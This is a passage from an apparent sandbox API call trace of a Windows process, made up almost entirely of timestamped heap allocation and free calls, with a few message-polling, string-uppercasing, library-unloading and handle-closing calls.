lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.227] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.227] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.228] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.228] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.228] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.228] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.229] FreeLibrary (hLibModule=0x76390000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.229] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0087.229] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.239] CloseHandle (hObject=0x294) returned 1 [0087.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.242] CloseHandle (hObject=0x2c4) returned 1 [0087.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0087.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a779b8 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a770d0 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774b8 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77580 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a779e0 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778c8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a30 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a775f8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a775a8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76ec8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: 